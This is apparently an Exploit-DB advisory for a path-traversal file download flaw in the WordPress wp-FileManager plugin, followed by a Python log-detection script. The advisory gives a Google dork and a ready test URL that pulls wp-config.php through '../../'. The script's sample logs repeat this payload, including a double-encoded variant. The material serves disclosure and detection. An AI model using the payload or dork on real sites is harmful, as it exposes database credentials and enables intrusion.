# Title : WordPress wp-FileManager - Arbitrary File Download Vulnerability
# Published : 2013-05-14
# Author :

Title: WordPress wp-FileManager Local File Download Vulnerability
Author: ByEge
Download: http://wordpress.org/extend/plugins/wp-filemanager/
Test Platform: Linux
Images: http://j1305.hizliresim.com/19/f/n0xxf.jpg
Vuln. Plat.: Web Application

Google Dorks: inurl:wp-content/plugins/wp-filemanager/
Test : http://server/wp-content/plugins/wp-filemanager/incl/libfile.php?&path=../../&filename=wp-config.php&action=download

# Exploit-DB Note:
# In order for this to work, the "Allow Download" setting must be checked in the FileManager's settings.
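
Detection example (added here, not part of the original advisory or the plugin's code): a log check that flags download requests to the endpoint in the Test URL whose path or filename parameter contains a ".." segment, including percent-encoded and double-encoded forms. The access log format (Apache/nginx "combined") and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Endpoint taken from the advisory's test URL.
ENDPOINT = "/wp-content/plugins/wp-filemanager/incl/libfile.php"
# Assumption: "combined" access log; only the request line and status code are used.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so that %252e%252e is recognised as '..'."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def has_dotdot(value):
    """True if any path segment is '..' (backslashes treated as separators)."""
    return ".." in value.replace("\\", "/").split("/")

def classify(line):
    """Return None for unrelated lines, else details of the download request."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    if not fully_decode(url.path).lower().endswith(ENDPOINT):
        return None
    params = parse_qs(url.query, keep_blank_values=True)
    if params.get("action", [""])[0].lower() != "download":
        return None
    path = fully_decode(params.get("path", [""])[0])
    filename = fully_decode(params.get("filename", [""])[0])
    return {"path": path, "filename": filename, "served": m.group("status") == "200",
            "traversal": has_dotdot(path) or has_dotdot(filename)}

def traversal_hits(lines):
    """Return classified requests whose path or filename leaves the base directory."""
    results = (classify(line) for line in lines)
    return [r for r in results if r and r["traversal"]]

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [14/May/2013:10:00:01 +0000] "GET /wp-content/plugins/wp-filemanager/incl/libfile.php?&path=../../&filename=wp-config.php&action=download HTTP/1.1" 200 3120 "-" "-"',
    '192.0.2.20 - - [14/May/2013:10:02:11 +0000] "GET /wp-content/plugins/wp-filemanager/incl/libfile.php?path=uploads/&filename=report.pdf&action=download HTTP/1.1" 200 88211 "-" "-"',
    '192.0.2.30 - - [14/May/2013:10:05:47 +0000] "GET /blog/wp-content/plugins/wp-filemanager/incl/libfile.php?path=%252e%252e%252f%252e%252e%252f&filename=wp-config.php&action=download HTTP/1.1" 403 199 "-" "-"',
    '192.0.2.40 - - [14/May/2013:10:06:02 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "-"',
]
```

A flagged request with "served" set to true is the one to triage first, since per the Exploit-DB note the download only works when "Allow Download" is enabled.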